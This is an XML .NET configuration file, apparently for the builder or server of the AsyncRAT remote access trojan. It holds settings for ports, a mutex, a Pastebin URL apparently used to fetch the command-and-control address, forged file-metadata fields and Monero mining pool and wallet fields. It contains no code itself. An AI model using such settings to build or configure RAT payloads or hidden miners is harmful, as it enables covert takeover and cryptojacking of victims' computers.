<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <configSections>
    <sectionGroup name="userSettings" type="System.Configuration.UserSettingsGroup, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089">
      <section name="Server.Properties.Settings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" allowExeDefinition="MachineToLocalUser" requirePermission="false" />
      <section name="AsyncRAT_Sharp.Properties.Settings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" allowExeDefinition="MachineToLocalUser" requirePermission="false" />
    </sectionGroup>
  </configSections>
  <startup>
    <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.6" />
  </startup>
  <userSettings>
    <Server.Properties.Settings>
      <setting name="Ports" serializeAs="String">
        <value />
      </setting>
      <setting name="Filename" serializeAs="String">
        <value />
      </setting>
      <setting name="Notification" serializeAs="String">
        <value>True</value>
      </setting>
      <setting name="Mutex" serializeAs="String">
        <value>AsyncMutex_6SI8OkPnk</value>
      </setting>
      <setting name="Pastebin" serializeAs="String">
        <value>https://pastebin.com/raw/s14cUU5G</value>
      </setting>
      <setting name="IP" serializeAs="String">
        <value />
      </setting>
      <setting name="ProductName" serializeAs="String">
        <value />
      </setting>
      <setting name="txtDescription" serializeAs="String">
        <value />
      </setting>
      <setting name="txtCompany" serializeAs="String">
        <value />
      </setting>
      <setting name="txtCopyright" serializeAs="String">
        <value />
      </setting>
      <setting name="txtTrademarks" serializeAs="String">
        <value />
      </setting>
      <setting name="txtOriginalFilename" serializeAs="String">
        <value />
      </setting>
      <setting name="txtProductVersion" serializeAs="String">
        <value>0.0.0.0</value>
      </setting>
      <setting name="txtFileVersion" serializeAs="String">
        <value>0.0.0.0</value>
      </setting>
      <setting name="txtPool" serializeAs="String">
        <value />
      </setting>
      <setting name="txtWallet" serializeAs="String">
        <value />
      </setting>
      <setting name="txtxmrPass" serializeAs="String">
        <value />
      </setting>
      <setting name="txtBlocked" serializeAs="String">
        <value />
      </setting>
      <setting name="Group" serializeAs="String">
        <value>Default</value>
      </setting>
    </Server.Properties.Settings>
    <AsyncRAT_Sharp.Properties.Settings>
      <setting name="Ports" serializeAs="String">
        <value />
      </setting>
      <setting name="Filename" serializeAs="String">
        <value />
      </setting>
      <setting name="Notification" serializeAs="String">
        <value>True</value>
      </setting>
      <setting name="Mutex" serializeAs="String">
        <value />
      </setting>
      <setting name="Pastebin" serializeAs="String">
        <value />
      </setting>
      <setting name="IP" serializeAs="String">
        <value />
      </setting>
      <setting name="ProductName" serializeAs="String">
        <value />
      </setting>
      <setting name="txtDescription" serializeAs="String">
        <value />
      </setting>
      <setting name="txtCompany" serializeAs="String">
        <value />
      </setting>
      <setting name="txtCopyright" serializeAs="String">
        <value />
      </setting>
      <setting name="txtTrademarks" serializeAs="String">
        <value />
      </setting>
      <setting name="txtOriginalFilename" serializeAs="String">
        <value />
      </setting>
      <setting name="txtProductVersion" serializeAs="String">
        <value>0.0.0.0</value>
      </setting>
      <setting name="txtFileVersion" serializeAs="String">
        <value>0.0.0.0</value>
      </setting>
    </AsyncRAT_Sharp.Properties.Settings>
  </userSettings>
  <appSettings>
    <add key="EnableWindowsFormsHighDpiAutoResizing" value="true" />
    <add key="ClientSettingsProvider.ServiceUri" value="" />
  </appSettings>
  <system.web>
    <membership defaultProvider="ClientAuthenticationMembershipProvider">
      <providers>
        <add name="ClientAuthenticationMembershipProvider" type="System.Web.ClientServices.Providers.ClientFormsAuthenticationMembershipProvider, System.Web.Extensions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" serviceUri="" />
      </providers>
    </membership>
    <roleManager defaultProvider="ClientRoleProvider" enabled="true">
      <providers>
        <add name="ClientRoleProvider" type="System.Web.ClientServices.Providers.ClientRoleProvider, System.Web.Extensions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" serviceUri="" cacheTimeout="86400" />
      </providers>
    </roleManager>
  </system.web>
</configuration>